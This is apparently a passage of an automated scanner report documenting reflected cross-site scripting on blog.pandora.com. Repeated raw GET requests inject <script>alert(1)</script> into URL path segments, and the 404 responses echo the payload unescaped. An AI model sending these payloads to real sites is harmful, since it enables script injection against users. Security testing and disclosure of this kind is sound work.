Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/054fdb9<script>alert(1)</script>8f219a229f4/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ddb1<script>alert(1)</script>d964ffd68f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora5ddb1<script>alert(1)</script>d964ffd68f4/archives/2009/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora5ddb1<script>alert(1)</script>d964ffd68f4/archives/2009/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40560<script>alert(1)</script>8295fb9672e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives40560<script>alert(1)</script>8295fb9672e/2009/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives40560<script>alert(1)</script>8295fb9672e/2009/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35d6a<script>alert(1)</script>61d8424a6b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200935d6a<script>alert(1)</script>61d8424a6b1/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200935d6a<script>alert(1)</script>61d8424a6b1/06/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6dc78<script>alert(1)</script>f9f9f8b2891 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/066dc78<script>alert(1)</script>f9f9f8b2891/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/066dc78<script>alert(1)</script>f9f9f8b2891/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea0d3<script>alert(1)</script>7e8e5ab80a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraea0d3<script>alert(1)</script>7e8e5ab80a9/archives/2009/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraea0d3<script>alert(1)</script>7e8e5ab80a9/archives/2009/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e6355<script>alert(1)</script>dcc343d2bd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivese6355<script>alert(1)</script>dcc343d2bd0/2009/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivese6355<script>alert(1)</script>dcc343d2bd0/2009/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bdd32<script>alert(1)</script>e2655d97c30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009bdd32<script>alert(1)</script>e2655d97c30/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:36 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009bdd32<script>alert(1)</script>e2655d97c30/07/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b55f0<script>alert(1)</script>a60f65ec066 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/07b55f0<script>alert(1)</script>a60f65ec066/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:39 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/07b55f0<script>alert(1)</script>a60f65ec066/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9cddd<script>alert(1)</script>c07d7b6b6e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9cddd<script>alert(1)</script>c07d7b6b6e1/archives/2009/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:33 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora9cddd<script>alert(1)</script>c07d7b6b6e1/archives/2009/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9fc45<script>alert(1)</script>73d64655690 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives9fc45<script>alert(1)</script>73d64655690/2009/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:35 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives9fc45<script>alert(1)</script>73d64655690/2009/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3275c<script>alert(1)</script>7f101df09f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20093275c<script>alert(1)</script>7f101df09f6/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20093275c<script>alert(1)</script>7f101df09f6/08/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 48254<script>alert(1)</script>063e227bb42 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/0848254<script>alert(1)</script>063e227bb42/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:41 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/0848254<script>alert(1)</script>063e227bb42/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee644<script>alert(1)</script>e5f841d0237 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraee644<script>alert(1)</script>e5f841d0237/archives/2009/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:30 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraee644<script>alert(1)</script>e5f841d0237/archives/2009/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload da5b9<script>alert(1)</script>ee09fe65134 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesda5b9<script>alert(1)</script>ee09fe65134/2009/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:32 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesda5b9<script>alert(1)</script>ee09fe65134/2009/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload caeac<script>alert(1)</script>9cab335ec9e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009caeac<script>alert(1)</script>9cab335ec9e/09/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:34 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009caeac<script>alert(1)</script>9cab335ec9e/09/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7f8a9<script>alert(1)</script>cdadd2e3fba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/097f8a9<script>alert(1)</script>cdadd2e3fba/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:37 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009/097f8a9<script>alert(1)</script>cdadd2e3fba/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8a732<script>alert(1)</script>04358b3b570 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8a732<script>alert(1)</script>04358b3b570/archives/2009/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:52 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8a732<script>alert(1)</script>04358b3b570/archives/2009/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cb43c<script>alert(1)</script>796ed772059 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivescb43c<script>alert(1)</script>796ed772059/2009/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:56 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivescb43c<script>alert(1)</script>796ed772059/2009/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ad1ff<script>alert(1)</script>c05ada4297f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009ad1ff<script>alert(1)</script>c05ada4297f/10/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2009ad1ff<script>alert(1)</script>c05ada4297f/10/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 241d1<script>alert(1)</script>0051722519f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
